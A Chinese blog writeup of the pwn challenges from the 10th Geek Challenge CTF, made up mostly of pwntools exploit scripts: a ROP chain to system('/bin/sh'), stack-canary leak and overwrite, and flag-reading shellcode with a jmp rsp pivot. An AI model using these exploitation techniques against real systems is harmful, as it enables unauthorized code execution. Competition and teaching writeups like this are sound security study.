第十届极客大挑战pwn

最新推荐文章于 2020-11-23 00:50:32 发布
最新推荐文章于 2020-11-23 00:50:32 发布
阅读量735 收藏 2
点赞数 1
分类专栏: 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/102997412
版权

Find tools

直接nc上去使用pwntool就可以看到base64字符串解密当作密码提即可

from pwn import *
import base64
p=remote('pwnto.fun',9999)
p.recvuntil('The key is :\n')
psd=p.recv(24)
psd=base64.b64decode(psd)
log.success('pas: '+psd)
p.send(psd)
p.interactive()

Baby rop

栈溢出覆盖返回地址到system参数’/bin/sh\x00’即可

from pwn import *
p=remote('pwnto.fun',10000)
elf=ELF('./hello')
offset=136
pop_rdi=0x0000400693 
payload='a'*offset+p64(pop_rdi)+p64(0x006010AE)+p64(elf.symbols['system'])
p.sendline(payload)
p.interactive()

babyshellcode

直接读flag文件好像还有非预期???

rom pwn import *
p=process('./RushB')
elf=ELF('./RushB')
def debug():
	gdb.attach(p)
context(os='linux',arch='amd64',log_level='debug')
print shellcraft.amd64.linux.sh()
shellcode='\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x66\x6c\x61\x67'
buf_addr=0x123000
pop_rdi=0x0400b53
p.recvuntil('have fun!')
p.send(shellcode)
p.recvuntil('CSGO?')
payload='a'*0x38+p64(buf_addr)
#debug()
p.sendline(payload)
p.interactive()

Baby canary

常规思路好像exp忘保存了~~不难的

Easy canary

from pwn import *
#p=process('./canary')
p=remote('pwnto.fun',10001)
elf=ELF('./canary')
def debug():
	gdb.attach(p)
p.recvuntil('Hava fun!')
payload='a'*20
p.sendline(payload)
p.recvuntil('aaaaaaaa\n')
canary=u32(p.recv(3).rjust(4,'\x00'))
log.success('canary: '+hex(canary))
p.recvuntil('try!')
payload='a'*20+p32(canary)+'a'*12+p32(0x08048647)
#debug()
p.sendline(payload)
p.interactive()

Not bad

也是直接读上面 的文件

from pwn import *
import pwnlib
context_arch='amd64'
#p=process('./bad')
p=remote('pwnto.fun',12301)
elf=ELF('./bad')
buf_addr=0x123000
jmp_rsp=0x00400a01
shellcode='''
push 0x67616c66
mov rdi,rsp 
push 2
pop rax
xor rsi,rsi
push 32
pop rdx
syscall
mov rdi,rax
mov rsi,rsp
xor rax,rax
syscall
push 1
pop rdi
push 1
pop rax
syscall
'''
shellcode=asm(shellcode,arch='amd64',os='linux')
log.success('sc_len: '+str(len(shellcode)))
payload=shellcode.ljust(40,'a')+p64(jmp_rsp)+asm('sub rsp,0x30;jmp rsp',arch='amd64',os='linux')
p.recvuntil('!')
#gdb.attach(p,'b *0x00400A49')
p.sendline(payload)
p.interactive()
doudoudedi
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
逆向萌新关于第十届挑战逆向部分做题的一些心得(一)(jiang'sfan)
Fer1g1的博客
10-26 594
逆向萌新关于第十届挑战逆向部分做题的一些心得(一)(jiang’sfan) 首先附上题目下载链接: 附件文件: https://share.weiyun.com/5lmZaMw,提取码:dl8e5l 备用链接:http://geek.sycsec.com:4444...
第十届挑战——部分web和RE的WP
A_dmin的博客
11-11 2691
第十届挑战——部分web和RE的WP web - 打比赛前先撸一只猫! web - 你看见过我的菜刀么 web - BurpSuiiiiiit!!! web - 性感潇文清,在线算卦 web - Easysql web - RCE me web - Lovelysql web - Babysql web - 神秘的三叶草 web - Jiang‘s Secret web - Hardsql web - 反序列化1.0 web - 又来一只猫 web - 你有
十一届挑战 RE PWN 全题解
qq_51868336的博客
11-23 578
第十一届挑战部分WP(无re和pwn
volcano的博客
11-21 1943
1webWelcome(150) web Welcome(150) 进入网站后发现页面405报错 猜想是请求方法错误,于是用burpsuite抓包,改请求方法再
CTF Geek Challenge——第十一届挑战Pwm Write Up
无限迭代中......
11-18 404
比赛时间:2020年10月17日早上9点 比赛时限:一个月 参考文章
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛" 涉及的是一个信息安全竞赛中的题目,该比赛可能是针对参赛者在网络安全领域,特别是"pwn"类问题解决能力的挑战。"pwn"在黑术语中通常指的是攻破或...
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【描述】"pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛"指出比赛的一个关键部分是"Pwn"类赛题。在信息安全竞赛中,Pwn通常指的是破解或漏洞利用类任务,要求参赛者发现并利用程序中的漏洞来获得控制...
pwn ubuntu18的运行环境自己搭建
最新发布
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
CTF Geek Challenge——第十一届挑战Misc Write Up
无限迭代中......
11-18 1004
比赛时间:2020年10月17日早上9点 比赛时限:一个月 参考文章
第十届挑战——复现未解决的web和RE
A_dmin的博客
12-06 1182
第十届挑战——复现未解决的web和RE 第十届挑战——复现未解决的web和RE web - 性感黄阿姨,在线聊天 web - Eval evil code web - 服务端检测系统 web - 你有特洛伊么 web - 你读懂潇文清的网站了吗 RE - 阅兵你认真看了嘛? RE - python1
第十届大赛WP-MISC、RE-2019.11.12
weixin_43497617的博客
11-12 392
序言:最近看雪的CTF题库也开启了,本来想去划水呢,结果第一道题就直接卡住了好长的时间。(真的是“电子竞技”,菜是原罪),唉,算了后续还会分析一下那个的第一道题。另外就是刚结束没多久的。这边是写了一些WP,有位老哥的WP也挺好的。文末给出那个老哥博的链接。他的博记录的WP是一些有关WEB的和RE的,重复的RE下面我就不在写了。 MISC RPG真是太有趣了吧:做题也太累了,不如来打会游戏吧...
Syc 2019第10届挑战wp
Rainbow_Melo
11-12 3063
1、打比赛前先撸一只猫! F12查看元素:简单的传参令?cat=dog即出flag 2、你看见过我的菜刀么 打开页面eval($_POST[“Syc”]);搬出菜刀连接找到flag即可 3、 BurpSuiiiiiit!!! 下载附件解压使用bp的Extender导入一个java类型的查看errors即得flag 4、性感潇文清,在线算卦 打开一个登陆界面,先随意输登陆一下,出现如下...
第十届比赛WP-2019.11.15
weixin_43497617的博客
11-18 187
序言:这篇文章主要是一些有关的WP有一些题是后面复现的(自己太菜了!) 冰菓 工具:dnspy 找到关键地方CheckStr()函数: 下面跟进: 可以看到上面显示判断了flag的字符长度,然后得出flag的长度是20,其实这个用处也没什么用…,紧接着后面就是加密的核心部分,观察完后直接写出解密py脚本: 运行后的画面: ...
十一届挑战部分wp
WFC1006848997的博客
11-18 4067
Web Welcome 访问状态码405,那说明是 HTTP 方法的请求, 那就修改 HTTP 方法的请求 ,改为POST方式得到源码 接着hash碰撞,因为是强等于,所以直接使用数组绕过即可 发现了flag文件,访问,出现404,抓包,头信息发现flag EZgit git泄露,直接githack下来,查看flag是不对,显然是经过更改的,所以我们直接查看日志,发现确实更改过了,然后我我们直接对比这个两个版本即可得出flag 朋友的学妹 右键查看源码,base64解密即可 EZwww 根据题目的意
第十届挑战部分writeup
Sy0ung_的博客
05-22 540
MISC 1.是谁杀了谁:注意自己的HP,别被气死了。 1.解压文件是一个exe文件,打开 2.来回试了几次发现会在目录中生成HP 文件,应该要对HP文件处理 3.用 010editor 打开HP文件得到flag Syc{I_kill3d_myself_Orz} 2.嘿,你喜欢吃鲱鱼罐头吗?:实验室禁止吃鲱鱼罐头! 1.这个题纠结了N年,开始以为对图片处理,修改了宽高都没用 2. hint: E...
2020第十一届挑战——Geek Challenge部分wp
monster663的博客
10-26 3993
比赛正在进行中,本来只剩web没有AK,然后出了一波新题,先留一个坑,之后再填
pwn】 [挑战 2019]Not Bad
Nothing
03-10 1078
例行检查 开了沙箱 程序逻辑很简单,存在0x18字节溢出,看是否能进行栈迁移,目前可控输入只有buf,但是buf只有0x20大小不够rop,所以尝试别的方法。程序在最开始mmap了一块内存,可写可执行,那么接下来目标就是1.在这块内存上写shellcode 2.跳转过来执行 由于不能rop且栈是可执行的想到能不能进行jmp rsp。在程序中找到了这个指令。 那么就可以在buf上布置read以...
Introduction-to-Pwn.pdf
09-09
pwn学习手册

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值